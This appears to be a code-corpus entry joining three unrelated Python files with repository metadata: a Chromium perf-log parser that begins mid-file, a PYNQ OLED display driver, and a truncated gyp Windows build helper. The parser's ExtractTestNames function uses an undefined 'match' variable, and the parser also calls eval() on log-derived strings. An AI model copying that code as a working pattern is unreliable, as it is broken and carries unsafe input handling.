"""Writes a new entry to an existing perf data file to be graphed.
If there's an existing line with the same revision number, overwrite its data
with the new line. Else, prepend the info for the new revision.
Args:
new_line: A dictionary representing perf information for the new entry.
existing_lines: A list of string lines from the existing perf data file.
revision: The string revision number associated with the new perf entry.
data_file: The string name of the perf data file to which to write.
"""
overwritten = False
for i, line in enumerate(existing_lines):
line_dict = simplejson.loads(line)
if line_dict['rev'] == revision:
existing_lines[i] = simplejson.dumps(new_line)
overwritten = True
break
elif int(line_dict['rev']) < int(revision):
break
if not overwritten:
existing_lines.insert(0, simplejson.dumps(new_line))
with open(data_file, 'w') as f:
f.write('\n'.join(existing_lines))
os.chmod(data_file, 0755)
def OutputPerfData(revision, graph_name, values, units, units_x, dest_dir,
is_stacked=False, stack_order=[]):
"""Outputs perf data to a local text file to be graphed.
Args:
revision: The string revision number associated with the perf data.
graph_name: The string name of the graph on which to plot the data.
values: A dict which maps a description to a value. A value is either a
single data value to be graphed, or a list of 2-tuples
representing (x, y) points to be graphed for long-running tests.
units: The string description for the y-axis units on the graph.
units_x: The string description for the x-axis units on the graph. Should
be set to None if the results are not for long-running graphs.
dest_dir: The name of the destination directory to which to write.
is_stacked: True to draw a "stacked" graph. First-come values are
stacked at bottom by default.
stack_order: A list that contains key strings in the order to stack values
in the graph.
"""
# Update graphs.dat, which contains metadata associated with each graph.
existing_graphs = []
graphs_file = os.path.join(dest_dir, 'graphs.dat')
if os.path.exists(graphs_file):
with open(graphs_file, 'r') as f:
existing_graphs = simplejson.loads(f.read())
is_new_graph = True
for graph in existing_graphs:
if graph['name'] == graph_name:
is_new_graph = False
break
if is_new_graph:
new_graph = {
'name': graph_name,
'units': units,
'important': False,
}
if units_x:
new_graph['units_x'] = units_x
existing_graphs.append(new_graph)
existing_graphs = sorted(existing_graphs, key=lambda x: x['name'])
with open(graphs_file, 'w') as f:
f.write(simplejson.dumps(existing_graphs, indent=2))
os.chmod(graphs_file, 0755)
# Update summary data file, containing the actual data to be graphed.
data_file_name = graph_name + '-summary.dat'
existing_lines = []
data_file = os.path.join(dest_dir, data_file_name)
if os.path.exists(data_file):
with open(data_file, 'r') as f:
existing_lines = f.readlines()
existing_lines = map(lambda x: x.strip(), existing_lines)
new_traces = {}
for description in values:
value = values[description]
if units_x:
points = []
for point in value:
points.append([str(point[0]), str(point[1])])
new_traces[description] = points
else:
new_traces[description] = [str(value), str(0.0)]
new_line = {
'traces': new_traces,
'rev': revision
}
if is_stacked:
new_line['stack'] = True
new_line['stack_order'] = stack_order
WriteToDataFile(new_line, existing_lines, revision, data_file)
def OutputEventData(revision, event_dict, dest_dir):
"""Outputs event data to a local text file to be graphed.
Args:
revision: The string revision number associated with the event data.
event_dict: A dict which maps a description to an array of tuples
representing event data to be graphed.
dest_dir: The name of the destination directory to which to write.
"""
data_file_name = '_EVENT_-summary.dat'
existing_lines = []
data_file = os.path.join(dest_dir, data_file_name)
if os.path.exists(data_file):
with open(data_file, 'r') as f:
existing_lines = f.readlines()
existing_lines = map(lambda x: x.strip(), existing_lines)
new_events = {}
for description in event_dict:
event_list = event_dict[description]
value_list = []
for event_time, event_data in event_list:
value_list.append([str(event_time), event_data])
new_events[description] = value_list
new_line = {
'rev': revision,
'events': new_events
}
WriteToDataFile(new_line, existing_lines, revision, data_file)
def UpdatePerfDataFromFetchedContent(
revision, content, webapp_name, test_name, graph_dir, only_dmp=False):
"""Update perf data from fetched stdio data.
Args:
revision: The string revision number associated with the new perf entry.
content: Fetched stdio data.
webapp_name: A name of the webapp.
test_name: A name of the test.
graph_dir: A path to the graph directory.
only_dmp: True if only Deep Memory Profiler results should be used.
"""
perf_data_raw = []
def AppendRawPerfData(graph_name, description, value, units, units_x,
webapp_name, test_name, is_stacked=False):
perf_data_raw.append({
'graph_name': graph_name,
'description': description,
'value': value,
'units': units,
'units_x': units_x,
'webapp_name': webapp_name,
'test_name': test_name,
'stack': is_stacked,
})
# First scan for short-running perf test results.
for match in re.findall(
r'RESULT ([^:]+): ([^=]+)= ([-\d\.]+) (\S+)', content):
if (not only_dmp) or match[0].endswith('-DMP'):
try:
match2 = eval(match[2])
except SyntaxError:
match2 = None
if match2:
AppendRawPerfData(match[0], match[1], match2, match[3], None,
webapp_name, webapp_name)
# Next scan for long-running perf test results.
for match in re.findall(
r'RESULT ([^:]+): ([^=]+)= (\[[^\]]+\]) (\S+) (\S+)', content):
if (not only_dmp) or match[0].endswith('-DMP'):
try:
match2 = eval(match[2])
except SyntaxError:
match2 = None
# TODO(dmikurube): Change the condition to use stacked graph when we
# determine how to specify it.
if match2:
AppendRawPerfData(match[0], match[1], match2, match[3], match[4],
webapp_name, test_name, match[0].endswith('-DMP'))
# Next scan for events in the test results.
for match in re.findall(
r'RESULT _EVENT_: ([^=]+)= (\[[^\]]+\])', content):
try:
match1 = eval(match[1])
except SyntaxError:
match1 = None
if match1:
AppendRawPerfData('_EVENT_', match[0], match1, None, None,
webapp_name, test_name)
# For each graph_name/description pair that refers to a long-running test
# result or an event, concatenate all the results together (assume results
# in the input file are in the correct order). For short-running test
# results, keep just one if more than one is specified.
perf_data = {} # Maps a graph-line key to a perf data dictionary.
for data in perf_data_raw:
key_graph = data['graph_name']
key_description = data['description']
if not key_graph in perf_data:
perf_data[key_graph] = {
'graph_name': data['graph_name'],
'value': {},
'units': data['units'],
'units_x': data['units_x'],
'webapp_name': data['webapp_name'],
'test_name': data['test_name'],
}
perf_data[key_graph]['stack'] = data['stack']
if 'stack_order' not in perf_data[key_graph]:
perf_data[key_graph]['stack_order'] = []
if (data['stack'] and
data['description'] not in perf_data[key_graph]['stack_order']):
perf_data[key_graph]['stack_order'].append(data['description'])
if data['graph_name'] != '_EVENT_' and not data['units_x']:
# Short-running test result.
perf_data[key_graph]['value'][key_description] = data['value']
else:
# Long-running test result or event.
if key_description in perf_data[key_graph]['value']:
perf_data[key_graph]['value'][key_description] += data['value']
else:
perf_data[key_graph]['value'][key_description] = data['value']
# Finally, for each graph-line in |perf_data|, update the associated local
# graph data files if necessary.
for perf_data_key in perf_data:
perf_data_dict = perf_data[perf_data_key]
dest_dir = os.path.join(graph_dir, perf_data_dict['webapp_name'])
if not os.path.exists(dest_dir):
os.mkdir(dest_dir) # Webapp name directory.
os.chmod(dest_dir, 0755)
dest_dir = os.path.join(dest_dir, perf_data_dict['test_name'])
SetupBaseGraphDirIfNeeded(perf_data_dict['webapp_name'],
perf_data_dict['test_name'], dest_dir)
if perf_data_dict['graph_name'] == '_EVENT_':
OutputEventData(revision, perf_data_dict['value'], dest_dir)
else:
OutputPerfData(revision, perf_data_dict['graph_name'],
perf_data_dict['value'],
perf_data_dict['units'], perf_data_dict['units_x'],
dest_dir,
perf_data_dict['stack'], perf_data_dict['stack_order'])
def SlaveLocation(master_location, slave_info):
"""Returns slave location for |master_location| and |slave_info|."""
if master_location.startswith('http://'):
return master_location + urllib.quote(slave_info['slave_name'])
else:
return os.path.join(master_location,
slave_info['slave_name'].translate(MANGLE_TRANSLATION))
def GetRevisionAndLogs(slave_location, build_num):
"""Get a revision number and log locations.
Args:
slave_location: A URL or a path to the build slave data.
build_num: A build number.
Returns:
A pair of the revision number and a list of strings that contain locations
of logs. (False, []) in case of error.
"""
if slave_location.startswith('http://'):
location = slave_location + '/builds/' + str(build_num)
else:
location = os.path.join(slave_location, str(build_num))
revision = False
logs = []
fp = None
try:
if location.startswith('http://'):
fp = urllib2.urlopen(location)
contents = fp.read()
revisions = re.findall(r'<td class="left">got_revision</td>\s+'
'<td>(\d+)</td>\s+<td>Source</td>', contents)
if revisions:
revision = revisions[0]
logs = [location + link + '/text' for link
in re.findall(r'(/steps/endure[^/]+/logs/stdio)', contents)]
else:
fp = open(location, 'rb')
build = cPickle.load(fp)
properties = build.getProperties()
if properties.has_key('got_revision'):
revision = build.getProperty('got_revision')
candidates = os.listdir(slave_location)
logs = [os.path.join(slave_location, filename)
for filename in candidates
if re.match(r'%d-log-endure[^/]+-stdio' % build_num, filename)]
except urllib2.URLError, e:
logging.exception('Error reading build URL "%s": %s', location, str(e))
return False, []
except (IOError, OSError), e:
logging.exception('Error reading build file "%s": %s', location, str(e))
return False, []
finally:
if fp:
fp.close()
return revision, logs
def ExtractTestNames(log_location, is_dbg):
"""Extract test names from |log_location|.
Returns:
A dict of a log location, webapp's name and test's name. False if error.
"""
if log_location.startswith('http://'):
location = urllib.unquote(log_location)
test_pattern = r'endure_([^_]+)(_test |-)([^/]+)/'
else:
location = log_location
test_pattern = r'endure_([^_]+)(_test_|-)([^/]+)-stdio'
match = match[0]
webapp_name = match[0]
webapp_name = webapp_name + '_dbg' if is_dbg else webapp_name
test_name = match[2]
return {
'location': log_location,
'webapp_name': webapp_name,
'test_name': test_name,
}
def GetStdioContents(stdio_location):
"""Gets appropriate stdio contents.
Returns:
A content string of the stdio log. None in case of error.
"""
fp = None
contents = ''
try:
if stdio_location.startswith('http://'):
fp = urllib2.urlopen(stdio_location, timeout=60)
# Since in-progress test output is sent chunked, there's no EOF. We need
# to specially handle this case so we don't hang here waiting for the
# test to complete.
start_time = time.time()
while True:
data = fp.read(1024)
if not data:
break
contents += data
if time.time() - start_time >= 30: # Read for at most 30 seconds.
break
else:
fp = open(stdio_location)
data = fp.read()
contents = ''
index = 0
# Buildbot log files are stored in the netstring format.
# http://en.wikipedia.org/wiki/Netstring
while index < len(data):
index2 = index
while data[index2].isdigit():
index2 += 1
if data[index2] != ':':
logging.error('Log file is not in expected format: %s' %
stdio_location)
contents = None
break
length = int(data[index:index2])
index = index2 + 1
channel = int(data[index])
index += 1
if data[index+length-1] != ',':
logging.error('Log file is not in expected format: %s' %
stdio_location)
contents = None
break
if channel == 0:
contents += data[index:(index+length-1)]
index += length
except (urllib2.URLError, socket.error, IOError, OSError), e:
# Issue warning but continue to the next stdio link.
logging.warning('Error reading test stdio data "%s": %s',
stdio_location, str(e))
finally:
if fp:
fp.close()
return contents
def UpdatePerfDataForSlaveAndBuild(
slave_info, build_num, graph_dir, master_location):
"""Process updated perf data for a particular slave and build number.
Args:
slave_info: A dictionary containing information about the slave to process.
build_num: The particular build number on the slave to process.
graph_dir: A path to the graph directory.
master_location: A URL or a path to the build master data.
Returns:
True if the perf data for the given slave/build is updated properly, or
False if any critical error occurred.
"""
if not master_location.startswith('http://'):
# Source is a file.
from buildbot.status import builder
slave_location = SlaveLocation(master_location, slave_info)
logging.debug(' %s, build %d.', slave_info['slave_name'], build_num)
is_dbg = '(dbg)' in slave_info['slave_name']
revision, logs = GetRevisionAndLogs(slave_location, build_num)
if not revision:
return False
stdios = []
for log_location in logs:
stdio = ExtractTestNames(log_location, is_dbg)
if not stdio:
return False
stdios.append(stdio)
for stdio in stdios:
stdio_location = stdio['location']
contents = GetStdioContents(stdio_location)
if contents:
UpdatePerfDataFromFetchedContent(revision, contents,
stdio['webapp_name'],
stdio['test_name'],
graph_dir, is_dbg)
return True
def GetMostRecentBuildNum(master_location, slave_name):
"""Gets the most recent buld number for |slave_name| in |master_location|."""
most_recent_build_num = None
if master_location.startswith('http://'):
slave_url = master_location + urllib.quote(slave_name)
url_contents = ''
fp = None
try:
fp = urllib2.urlopen(slave_url, timeout=60)
url_contents = fp.read()
except urllib2.URLError, e:
logging.exception('Error reading builder URL: %s', str(e))
return None
finally:
if fp:
fp.close()
matches = re.findall(r'/(\d+)/stop', url_contents)
if matches:
most_recent_build_num = int(matches[0])
else:
matches = re.findall(r'#(\d+)</a></td>', url_contents)
if matches:
most_recent_build_num = sorted(map(int, matches), reverse=True)[0]
else:
slave_path = os.path.join(master_location,
slave_name.translate(MANGLE_TRANSLATION))
files = os.listdir(slave_path)
number_files = [int(filename) for filename in files if filename.isdigit()]
if number_files:
most_recent_build_num = sorted(number_files, reverse=True)[0]
if most_recent_build_num:
logging.debug('%s most recent build number: %s',
slave_name, most_recent_build_num)
else:
logging.error('Could not identify latest build number for slave %s.',
slave_name)
return most_recent_build_num
def UpdatePerfDataFiles(graph_dir, master_location):
"""Updates the Chrome Endure graph data files with the latest test results.
For each known Chrome Endure slave, we scan its latest test results looking
for any new test data. Any new data that is found is then appended to the
data files used to display the Chrome Endure graphs.
Args:
graph_dir: A path to the graph directory.
master_location: A URL or a path to the build master data.
Returns:
True if all graph data files are updated properly, or
False if any error occurred.
"""
slave_list = []
for slave_name in CHROME_ENDURE_SLAVE_NAMES:
slave_info = {}
slave_info['slave_name'] = slave_name
slave_info['most_recent_build_num'] = None
slave_info['last_processed_build_num'] = None
slave_list.append(slave_info)
# Identify the most recent build number for each slave.
logging.debug('Searching for latest build numbers for each slave...')
for slave in slave_list:
slave_name = slave['slave_name']
slave['most_recent_build_num'] = GetMostRecentBuildNum(
master_location, slave_name)
# Identify the last-processed build number for each slave.
logging.debug('Identifying last processed build numbers...')
if not os.path.exists(LAST_BUILD_NUM_PROCESSED_FILE):
for slave_info in slave_list:
slave_info['last_processed_build_num'] = 0
else:
with open(LAST_BUILD_NUM_PROCESSED_FILE, 'r') as fp:
file_contents = fp.read()
for match in re.findall(r'([^:]+):(\d+)', file_contents):
slave_name = match[0].strip()
last_processed_build_num = match[1].strip()
for slave_info in slave_list:
if slave_info['slave_name'] == slave_name:
slave_info['last_processed_build_num'] = int(
last_processed_build_num)
for slave_info in slave_list:
if not slave_info['last_processed_build_num']:
slave_info['last_processed_build_num'] = 0
logging.debug('Done identifying last processed build numbers.')
# For each Chrome Endure slave, process each build in-between the last
# processed build num and the most recent build num, inclusive. To process
# each one, first get the revision number for that build, then scan the test
# result stdio for any performance data, and add any new performance data to
# local files to be graphed.
for slave_info in slave_list:
logging.debug('Processing %s, builds %d-%d...',
slave_info['slave_name'],
slave_info['last_processed_build_num'],
slave_info['most_recent_build_num'])
curr_build_num = slave_info['last_processed_build_num']
while curr_build_num <= slave_info['most_recent_build_num']:
if not UpdatePerfDataForSlaveAndBuild(slave_info, curr_build_num,
graph_dir, master_location):
# Do not give up. The first files might be removed by buildbot.
logging.warning('Logs do not exist in buildbot for #%d of %s.' %
(curr_build_num, slave_info['slave_name']))
curr_build_num += 1
# Log the newly-processed build numbers.
logging.debug('Logging the newly-processed build numbers...')
with open(LAST_BUILD_NUM_PROCESSED_FILE, 'w') as f:
for slave_info in slave_list:
f.write('%s:%s\n' % (slave_info['slave_name'],
slave_info['most_recent_build_num']))
return True
def GenerateIndexPage(graph_dir):
"""Generates a summary (landing) page for the Chrome Endure graphs.
Args:
graph_dir: A path to the graph directory.
"""
logging.debug('Generating new index.html page...')
# Page header.
page = """
<html>
<head>
<title>Chrome Endure Overview</title>
<script language="javascript">
function DisplayGraph(name, graph) {
document.write(
'<td><iframe scrolling="no" height="438" width="700" src="');
document.write(name);
document.write('"></iframe></td>');
}
</script>
</head>
<body>
<center>
<h1>
Chrome Endure
</h1>
"""
# Print current time.
page += '<p>Updated: %s</p>\n' % (
time.strftime('%A, %B %d, %Y at %I:%M:%S %p %Z'))
# Links for each webapp.
webapp_names = [x for x in os.listdir(graph_dir) if
x not in ['js', 'old_data', '.svn', '.git'] and
os.path.isdir(os.path.join(graph_dir, x))]
webapp_names = sorted(webapp_names)
page += '<p> ['
for i, name in enumerate(webapp_names):
page += '<a href="#%s">%s</a>' % (name.upper(), name.upper())
if i < len(webapp_names) - 1:
page += ' | '
page += '] </p>\n'
# Print out the data for each webapp.
for webapp_name in webapp_names:
page += '\n<h1 id="%s">%s</h1>\n' % (webapp_name.upper(),
webapp_name.upper())
# Links for each test for this webapp.
test_names = [x for x in
os.listdir(os.path.join(graph_dir, webapp_name))]
test_names = sorted(test_names)
page += '<p> ['
for i, name in enumerate(test_names):
page += '<a href="#%s">%s</a>' % (name, name)
if i < len(test_names) - 1:
page += ' | '
page += '] </p>\n'
# Print out the data for each test for this webapp.
for test_name in test_names:
# Get the set of graph names for this test.
graph_names = [x[:x.find('-summary.dat')] for x in
os.listdir(os.path.join(graph_dir,
webapp_name, test_name))
if '-summary.dat' in x and '_EVENT_' not in x]
graph_names = sorted(graph_names)
page += '<h2 id="%s">%s</h2>\n' % (test_name, test_name)
page += '<table>\n'
for i, graph_name in enumerate(graph_names):
if i % 2 == 0:
page += ' <tr>\n'
page += (' <script>DisplayGraph("%s/%s?graph=%s&lookout=1");'
'</script>\n' % (webapp_name, test_name, graph_name))
if i % 2 == 1:
page += ' </tr>\n'
if len(graph_names) % 2 == 1:
page += ' </tr>\n'
page += '</table>\n'
# Page footer.
page += """
</center>
</body>
</html>
"""
index_file = os.path.join(graph_dir, 'index.html')
with open(index_file, 'w') as f:
f.write(page)
os.chmod(index_file, 0755)
def main():
parser = optparse.OptionParser()
parser.add_option(
'-v', '--verbose', action='store_true', default=False,
help='Use verbose logging.')
parser.add_option(
'-s', '--stdin', action='store_true', default=False,
help='Input from stdin instead of slaves for testing this script.')
parser.add_option(
'-b', '--buildbot', dest='buildbot', metavar="BUILDBOT",
default=BUILDER_URL_BASE,
help='Use log files in a buildbot at BUILDBOT. BUILDBOT can be a '
'buildbot\'s builder URL or a local path to a buildbot directory. '
'Both an absolute path and a relative path are available, e.g. '
'"/home/chrome-bot/buildbot" or "../buildbot". '
'[default: %default]')
parser.add_option(
'-g', '--graph', dest='graph_dir', metavar="DIR", default=LOCAL_GRAPH_DIR,
help='Output graph data files to DIR. [default: %default]')
options, _ = parser.parse_args(sys.argv)
logging_level = logging.DEBUG if options.verbose else logging.INFO
logging.basicConfig(level=logging_level,
format='[%(asctime)s] %(levelname)s: %(message)s')
if options.stdin:
content = sys.stdin.read()
UpdatePerfDataFromFetchedContent(
'12345', content, 'webapp', 'test', options.graph_dir)
else:
if options.buildbot.startswith('http://'):
master_location = options.buildbot
else:
build_dir = os.path.join(options.buildbot, 'build')
third_party_dir = os.path.join(build_dir, 'third_party')
sys.path.append(third_party_dir)
sys.path.append(os.path.join(third_party_dir, 'buildbot_8_4p1'))
sys.path.append(os.path.join(third_party_dir, 'twisted_10_2'))
master_location = os.path.join(build_dir, 'masters',
'master.chromium.endure')
success = UpdatePerfDataFiles(options.graph_dir, master_location)
if not success:
logging.error('Failed to update perf data files.')
sys.exit(0)
GenerateIndexPage(options.graph_dir)
logging.debug('All done!')
if __name__ == '__main__':
main()
| {
"content_hash": "d99c10ded1dc3c75f681bbd345147f2c",
"timestamp": "",
"source": "github",
"line_count": 819,
"max_line_length": 80,
"avg_line_length": 35.21001221001221,
"alnum_prop": 0.6230883933835004,
"repo_name": "anirudhSK/chromium",
"id": "f477270e4895f0d87f820cc3c28bcf34a7d96666",
"size": "29026",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "chrome/test/functional/perf/endure_result_parser.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "ASP",
"bytes": "853"
},
{
"name": "AppleScript",
"bytes": "6973"
},
{
"name": "Arduino",
"bytes": "464"
},
{
"name": "Assembly",
"bytes": "52960"
},
{
"name": "Awk",
"bytes": "8660"
},
{
"name": "C",
"bytes": "42502191"
},
{
"name": "C#",
"bytes": "1132"
},
{
"name": "C++",
"bytes": "201859263"
},
{
"name": "CSS",
"bytes": "946557"
},
{
"name": "DOT",
"bytes": "2984"
},
{
"name": "Java",
"bytes": "5687122"
},
{
"name": "JavaScript",
"bytes": "22163714"
},
{
"name": "M",
"bytes": "2190"
},
{
"name": "Matlab",
"bytes": "2496"
},
{
"name": "Objective-C",
"bytes": "7670589"
},
{
"name": "PHP",
"bytes": "97817"
},
{
"name": "Perl",
"bytes": "672770"
},
{
"name": "Python",
"bytes": "10873885"
},
{
"name": "R",
"bytes": "262"
},
{
"name": "Shell",
"bytes": "1315894"
},
{
"name": "Tcl",
"bytes": "277091"
},
{
"name": "TypeScript",
"bytes": "1560024"
},
{
"name": "XSLT",
"bytes": "13493"
},
{
"name": "nesC",
"bytes": "15206"
}
],
"symlink_target": ""
} |
from . import Pmod
PMOD_OLED_PROGRAM = "pmod_oled.bin"
CLEAR_DISPLAY = 0x1
PRINT_STRING = 0x3
DRAW_LINE = 0x5
DRAW_RECT = 0x7
class Pmod_OLED(object):
"""This class controls an OLED Pmod.
The Pmod OLED (PB 200-222) is 128x32 pixel monochrome organic LED (OLED)
panel powered by the Solomon Systech SSD1306.
Attributes
----------
microblaze : Pmod
Microblaze processor instance used by this module.
"""
def __init__(self, mb_info, text=None):
"""Return a new instance of an OLED object.
Parameters
----------
mb_info : dict
A dictionary storing Microblaze information, such as the
IP name and the reset name.
text: str
The text to be displayed after initialization.
"""
self.microblaze = Pmod(mb_info, PMOD_OLED_PROGRAM)
self.clear()
if text:
self.write(text)
def clear(self):
"""Clear the OLED screen.
This is done by sending the clear command to the IOP.
Returns
-------
None
"""
self.microblaze.write_blocking_command(CLEAR_DISPLAY)
def write(self, text, x=0, y=0):
"""Write a new text string on the OLED.
Parameters
----------
text : str
The text string to be displayed on the OLED screen.
x : int
The x-position of the display.
y : int
The y-position of the display.
Returns
-------
None
"""
if not 0 <= x <= 255:
raise ValueError("X-position should be in [0, 255]")
if not 0 <= y <= 255:
raise ValueError("Y-position should be in [0, 255]")
if len(text) >= 64:
raise ValueError("Text too long to be displayed.")
# First write length, x, y, then write rest of string
data = [len(text), x, y]
data += [ord(char) for char in text]
self.microblaze.write_mailbox(0, data)
# Finally write the print string command
self.microblaze.write_blocking_command(PRINT_STRING)
def draw_line(self, x1, y1, x2, y2):
"""Draw a straight line on the OLED.
Parameters
----------
x1 : int
The x-position of the starting point.
y1 : int
The y-position of the starting point.
x2 : int
The x-position of the ending point.
y2 : int
The y-position of the ending point.
Returns
-------
None
"""
if not 0 <= x1 <= 255:
raise ValueError("X-position should be in [0, 255]")
if not 0 <= x2 <= 255:
raise ValueError("X-position should be in [0, 255]")
if not 0 <= y1 <= 255:
raise ValueError("Y-position should be in [0, 255]")
if not 0 <= y2 <= 255:
raise ValueError("Y-position should be in [0, 255]")
self.microblaze.write_mailbox(0, [x1, y1, x2, y2])
self.microblaze.write_blocking_command(DRAW_LINE)
def draw_rect(self, x1, y1, x2, y2):
"""Draw a rectangle on the OLED.
Parameters
----------
x1 : int
The x-position of the starting point.
y1 : int
The y-position of the starting point.
x2 : int
The x-position of the ending point.
y2 : int
The y-position of the ending point.
Returns
-------
None
"""
if not 0 <= x1 <= 255:
raise ValueError("X-position should be in [0, 255]")
if not 0 <= x2 <= 255:
raise ValueError("X-position should be in [0, 255]")
if not 0 <= y1 <= 255:
raise ValueError("Y-position should be in [0, 255]")
if not 0 <= y2 <= 255:
raise ValueError("Y-position should be in [0, 255]")
self.microblaze.write_mailbox(0, [x1, y1, x2, y2])
self.microblaze.write_blocking_command(DRAW_RECT)
| {
"content_hash": "14832756aa0e1fee3686a91b254c1bbb",
"timestamp": "",
"source": "github",
"line_count": 150,
"max_line_length": 77,
"avg_line_length": 27.813333333333333,
"alnum_prop": 0.5141418983700863,
"repo_name": "Xilinx/PYNQ",
"id": "2891fa64ca0375b5ff49c169ca047b46df33144c",
"size": "4253",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "pynq/lib/pmod/pmod_oled.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "51"
},
{
"name": "BitBake",
"bytes": "1840"
},
{
"name": "C",
"bytes": "1062607"
},
{
"name": "C++",
"bytes": "76769"
},
{
"name": "CMake",
"bytes": "578"
},
{
"name": "JavaScript",
"bytes": "239958"
},
{
"name": "Jupyter Notebook",
"bytes": "17148467"
},
{
"name": "Makefile",
"bytes": "165279"
},
{
"name": "Python",
"bytes": "1388540"
},
{
"name": "Shell",
"bytes": "67192"
},
{
"name": "SystemVerilog",
"bytes": "53374"
},
{
"name": "Tcl",
"bytes": "1383109"
},
{
"name": "VHDL",
"bytes": "738710"
},
{
"name": "Verilog",
"bytes": "284588"
}
],
"symlink_target": ""
} |
"""Utility functions for Windows builds.
These functions are executed via gyp-win-tool when using the ninja generator.
"""
from __future__ import print_function
import os
import re
import shutil
import subprocess
import stat
import string
import sys
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
# A regex matching an argument corresponding to the output filename passed to
# link.exe.
_LINK_EXE_OUT_ARG = re.compile('/OUT:(?P<out>.+)$', re.IGNORECASE)
def main(args):
executor = WinTool()
exit_code = executor.Dispatch(args)
if exit_code is not None:
sys.exit(exit_code)
class WinTool(object):
"""This class performs all the Windows tooling steps. The methods can either
be executed directly, or dispatched from an argument list."""
def _UseSeparateMspdbsrv(self, env, args):
"""Allows to use a unique instance of mspdbsrv.exe per linker instead of a
shared one."""
if len(args) < 1:
raise Exception("Not enough arguments")
if args[0] != 'link.exe':
return
# Use the output filename passed to the linker to generate an endpoint name
# for mspdbsrv.exe.
endpoint_name = None
for arg in args:
m = _LINK_EXE_OUT_ARG.match(arg)
if m:
endpoint_name = re.sub(r'\W+', '',
'%s_%d' % (m.group('out'), os.getpid()))
break
if endpoint_name is None:
return
# Adds the appropriate environment variable. This will be read by link.exe
# to know which instance of mspdbsrv.exe it should connect to (if it's
# not set then the default endpoint is used).
env['_MSPDBSRV_ENDPOINT_'] = endpoint_name
def Dispatch(self, args):
"""Dispatches a string command to a method."""
if len(args) < 1:
raise Exception("Not enough arguments")
method = "Exec%s" % self._CommandifyName(args[0])
return getattr(self, method)(*args[1:])
def _CommandifyName(self, name_string):
"""Transforms a tool name like recursive-mirror to RecursiveMirror."""
return name_string.title().replace('-', '')
def _GetEnv(self, arch):
"""Gets the saved environment from a file for a given architecture."""
# The environment is saved as an "environment block" (see CreateProcess
# and msvs_emulation for details). We convert to a dict here.
# Drop last 2 NULs, one for list terminator, one for trailing vs. separator.
pairs = open(arch).read()[:-2].split('\0')
kvs = [item.split('=', 1) for item in pairs]
return dict(kvs)
def ExecStamp(self, path):
"""Simple stamp command."""
open(path, 'w').close()
def ExecRecursiveMirror(self, source, dest):
"""Emulation of rm -rf out && cp -af in out."""
if os.path.exists(dest):
if os.path.isdir(dest):
def _on_error(fn, path, excinfo):
# The operation failed, possibly because the file is set to
# read-only. If that's why, make it writable and try the op again.
if not os.access(path, os.W_OK):
os.chmod(path, stat.S_IWRITE)
fn(path)
shutil.rmtree(dest, onerror=_on_error)
else:
if not os.access(dest, os.W_OK):
# Attempt to make the file writable before deleting it.
os.chmod(dest, stat.S_IWRITE)
os.unlink(dest)
if os.path.isdir(source):
shutil.copytree(source, dest)
else:
shutil.copy2(source, dest)
def ExecLinkWrapper(self, arch, use_separate_mspdbsrv, *args):
"""Filter diagnostic output from link that looks like:
' Creating library ui.dll.lib and object ui.dll.exp'
This happens when there are exports from the dll or exe.
"""
env = self._GetEnv(arch)
if use_separate_mspdbsrv == 'True':
self._UseSeparateMspdbsrv(env, args)
link = subprocess.Popen([args[0].replace('/', '\\')] + list(args[1:]),
shell=True,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
out, _ = link.communicate()
for line in out.splitlines():
if (not line.startswith(' Creating library ') and
not line.startswith('Generating code') and
not line.startswith('Finished generating code')):
print(line)
return link.returncode
def ExecLinkWithManifests(self, arch, embed_manifest, out, ldcmd, resname,
mt, rc, intermediate_manifest, *manifests):
"""A wrapper for handling creating a manifest resource and then executing
a link command."""
# The 'normal' way to do manifests is to have link generate a manifest
# based on gathering dependencies from the object files, then merge that
# manifest with other manifests supplied as sources, convert the merged
# manifest to a resource, and then *relink*, including the compiled
# version of the manifest resource. This breaks incremental linking, and
# is generally overly complicated. Instead, we merge all the manifests
# provided (along with one that includes what would normally be in the
# linker-generated one, see msvs_emulation.py), and include that into the
# first and only link. We still tell link to generate a manifest, but we
# only use that to assert that our simpler process did not miss anything.
variables = {
'python': sys.executable,
'arch': arch,
'out': out,
'ldcmd': ldcmd,
'resname': resname,
'mt': mt,
'rc': rc,
'intermediate_manifest': intermediate_manifest,
'manifests': ' '.join(manifests),
}
add_to_ld = ''
if manifests:
subprocess.check_call(
'%(python)s gyp-win-tool manifest-wrapper %(arch)s %(mt)s -nologo '
'-manifest %(manifests)s -out:%(out)s.manifest' % variables)
if embed_manifest == 'True':
subprocess.check_call(
'%(python)s gyp-win-tool manifest-to-rc %(arch)s %(out)s.manifest'
' %(out)s.manifest.rc %(resname)s' % variables)
subprocess.check_call(
'%(python)s gyp-win-tool rc-wrapper %(arch)s %(rc)s '
'%(out)s.manifest.rc' % variables)
add_to_ld = ' %(out)s.manifest.res' % variables
subprocess.check_call(ldcmd + add_to_ld)
# Run mt.exe on the theoretically complete manifest we generated, merging
# it with the one the linker generated to confirm that the linker
# generated one does not add anything. This is strictly unnecessary for
# correctness, it's only to verify that e.g. /MANIFESTDEPENDENCY was not
# used in a #pragma comment.
if manifests:
# Merge the intermediate one with ours to .assert.manifest, then check
# that .assert.manifest is identical to ours.
subprocess.check_call(
'%(python)s gyp-win-tool manifest-wrapper %(arch)s %(mt)s -nologo '
'-manifest %(out)s.manifest %(intermediate_manifest)s '
'-out:%(out)s.assert.manifest' % variables)
assert_manifest = '%(out)s.assert.manifest' % variables
our_manifest = '%(out)s.manifest' % variables
# Load and normalize the manifests. mt.exe sometimes removes whitespace,
# and sometimes doesn't unfortunately.
with open(our_manifest, 'rb') as our_f:
with open(assert_manifest, 'rb') as assert_f:
our_data = our_f.read().translate(None, string.whitespace)
assert_data = assert_f.read().translate(None, string.whitespace)
if our_data != assert_data:
os.unlink(out)
def dump(filename):
sys.stderr.write('%s\n-----\n' % filename)
with open(filename, 'rb') as f:
sys.stderr.write(f.read() + '\n-----\n')
dump(intermediate_manifest)
dump(our_manifest)
dump(assert_manifest)
sys.stderr.write(
'Linker generated manifest "%s" added to final manifest "%s" '
'(result in "%s"). '
'Were /MANIFEST switches used in #pragma statements? ' % (
intermediate_manifest, our_manifest, assert_manifest))
return 1
def ExecManifestWrapper(self, arch, *args):
